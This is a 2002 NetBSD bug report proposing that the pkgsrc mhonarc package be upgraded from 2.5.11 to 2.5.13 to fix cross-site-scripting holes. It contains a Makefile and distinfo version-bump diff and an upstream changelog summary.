Subject: pkg/19366: mhonarc package has cross-site-scripting vulnerabilities
To: None <gnats-bugs@gnats.netbsd.org>
From: Eric Gillespie <epg@pretzelnet.org>
List: netbsd-bugs
Date: 12/12/2002 16:48:47
>Number: 19366
>Category: pkg
>Synopsis: mhonarc package has cross-site-scripting vulnerabilities
>Confidential: no
>Severity: serious
>Priority: high
>Responsible: pkg-manager
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Thu Dec 12 13:49:00 PST 2002
>Closed-Date:
>Last-Modified:
>Originator:
>Release: NetBSD 1.6
>Organization:
>Environment:
System: NetBSD wundagore.pretzelnet.org 1.6 NetBSD 1.6 ($Id: WUNDAGORE 435 2002-10-02 02:08:24Z epg $) #4: Sun Nov 24 15:22:10 EST 2002 epg@wundagore.pretzelnet.org:/usr/src/sys/arch/i386/compile/WUNDAGORE i386
Architecture: i386
Machine: i386
>Description:
The version of mhonarc in pkgsrc (2.5.11) contains cross-script-scripting
vulnerabilities. No exploits are currently known for any of these.
>How-To-Repeat:
>Fix:
Upgrade to 2.5.13. Summary of changes below the diff, see
CHANGES file for details.
Index: Makefile
===================================================================
RCS file: /cvsroot/pkgsrc/mail/mhonarc/Makefile,v
retrieving revision 1.10
diff -a -u -r1.10 Makefile
--- Makefile 2002/08/23 01:48:26 1.10
+++ Makefile 2002/12/12 21:34:11
@@ -1,8 +1,8 @@
# $NetBSD: Makefile,v 1.10 2002/08/23 01:48:26 grant Exp $
#
-DISTNAME= MHonArc2.5.11
-PKGNAME= mhonarc-2.5.11
+DISTNAME= MHonArc2.5.13
+PKGNAME= mhonarc-2.5.13
CATEGORIES= mail
MASTER_SITES= http://www.oac.uci.edu/indiv/ehood/tar/ \
ftp://hhobel.phl.univie.ac.at/MHonArc/
Index: distinfo
===================================================================
RCS file: /cvsroot/pkgsrc/mail/mhonarc/distinfo,v
retrieving revision 1.6
diff -a -u -r1.6 distinfo
--- distinfo 2002/08/23 01:48:25 1.6
+++ distinfo 2002/12/12 21:34:11
@@ -1,4 +1,4 @@
$NetBSD: distinfo,v 1.6 2002/08/23 01:48:25 grant Exp $
-SHA1 (MHonArc2.5.11.tar.bz2) = 65960e6cfe8056efacbd90936eb00d88ec9ddad5
-Size (MHonArc2.5.11.tar.bz2) = 467400 bytes
+SHA1 (MHonArc2.5.13.tar.bz2) = 1c4543c3b96091e47bae47efa0b9585c6496f8ac
+Size (MHonArc2.5.13.tar.bz2) = 476495 bytes
Changes from 2.5.12 to 2.5.13:
* DBFILE resource can now be set to an absolute pathname.
* readmail.pl updated to handle MHTML messages better.
* readmail.pl handling of malformed multipart messages improved.
* Fixed problem where some message attachments were "lost".
* Various bug-fixes and improvements to m2h_external::filter,
most importantly, fixing cross-site-scripting holes.
Changes from 2.5.11 to 2.5.12:
* Strip more tags and attributes that could potentially be used for
XSS exploits in the HTML filter. This is a more of a preemptive
change since no new exploits have been reported.
* DATEFIELDS resource now supports indexed field names.
>Release-Note:
>Audit-Trail:
>Unformatted: